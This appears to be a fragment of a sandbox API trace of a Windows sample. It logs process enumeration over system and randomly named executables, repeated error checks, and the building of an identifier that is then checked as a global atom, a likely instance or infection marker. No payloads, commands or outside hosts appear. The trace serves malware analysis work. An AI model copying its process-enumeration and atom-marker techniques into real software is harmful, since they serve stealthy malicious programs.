	[0128.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.426] CloseHandle (hObject=0x2dc) returned 1
	[0128.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.426] CloseHandle (hObject=0x2dc) returned 1
	[0128.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.427] CloseHandle (hObject=0x2dc) returned 1
	[0128.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.427] CloseHandle (hObject=0x2dc) returned 1
	[0128.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.428] CloseHandle (hObject=0x2dc) returned 1
	[0128.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.428] CloseHandle (hObject=0x2dc) returned 1
	[0128.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.428] CloseHandle (hObject=0x2dc) returned 1
	[0128.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.429] CloseHandle (hObject=0x2dc) returned 1
	[0128.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.430] CloseHandle (hObject=0x2dc) returned 1
	[0128.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.430] CloseHandle (hObject=0x2dc) returned 1
	[0128.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.430] CloseHandle (hObject=0x2dc) returned 1
	[0128.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.431] CloseHandle (hObject=0x2dc) returned 1
	[0128.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.431] CloseHandle (hObject=0x2dc) returned 1
	[0128.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.432] CloseHandle (hObject=0x2dc) returned 1
	[0128.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.432] CloseHandle (hObject=0x2dc) returned 1
	[0128.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.432] CloseHandle (hObject=0x2dc) returned 1
	[0128.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.433] CloseHandle (hObject=0x2dc) returned 1
	[0128.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.433] CloseHandle (hObject=0x2dc) returned 1
	[0128.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.434] CloseHandle (hObject=0x2dc) returned 1
	[0128.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.434] CloseHandle (hObject=0x2dc) returned 1
	[0128.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.434] CloseHandle (hObject=0x2dc) returned 1
	[0128.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.435] CloseHandle (hObject=0x2dc) returned 1
	[0128.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.435] CloseHandle (hObject=0x2dc) returned 1
	[0128.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.436] CloseHandle (hObject=0x2dc) returned 1
	[0128.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.436] CloseHandle (hObject=0x2dc) returned 1
	[0128.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.437] CloseHandle (hObject=0x2dc) returned 1
	[0128.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.437] CloseHandle (hObject=0x2dc) returned 1
	[0128.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.437] CloseHandle (hObject=0x2dc) returned 1
	[0128.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.438] CloseHandle (hObject=0x2dc) returned 1
	[0128.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.438] CloseHandle (hObject=0x2dc) returned 1
	[0128.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.439] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetLastError () returned 0x5
	[0128.440] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.441] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.441] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] GetLastError () returned 0x5
	[0128.441] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.441] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.442] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetLastError () returned 0x5
	[0128.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.443] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.444] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.444] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.444] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.444] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.444] CloseHandle (hObject=0x2dc) returned 1
	[0128.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.445] CloseHandle (hObject=0x2dc) returned 1
	[0128.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.445] CloseHandle (hObject=0x2dc) returned 1
	[0128.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.445] CloseHandle (hObject=0x2dc) returned 1
	[0128.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.446] CloseHandle (hObject=0x2dc) returned 1
	[0128.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.446] CloseHandle (hObject=0x2dc) returned 1
	[0128.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
